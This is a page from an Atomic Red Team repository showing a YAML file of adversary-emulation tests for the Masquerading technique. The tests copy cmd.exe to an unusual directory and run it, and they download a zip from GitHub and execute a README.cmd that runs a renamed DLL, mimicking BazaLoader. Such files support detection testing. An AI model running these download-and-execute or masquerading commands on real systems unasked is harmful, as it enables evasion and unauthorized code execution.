security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1036/T1036.yaml
T
Carrie Roberts 72585c9dd7 fix typo (#2556)
2023-10-07 15:05:53 -04:00

43 lines
2.1 KiB
YAML
Raw Permalink Blame History

attack_technique: T1036
display_name: "Masquerading"
atomic_tests:
- name: System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
supported_platforms:
- windows
executor:
command: |-
copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5
stop-process -name "cmd" | out-null
cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue
name: powershell
- name: Malware Masquerading and Execution from Zip File
auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
supported_platforms:
- windows
input_arguments:
url:
description: Location of zip file
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip"
executor:
command: |-
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item "$env:userprofile\Downloads\T1036" -recurse -ErrorAction Ignore
name: powershell
Reference in New Issue View Git Blame Copy Permalink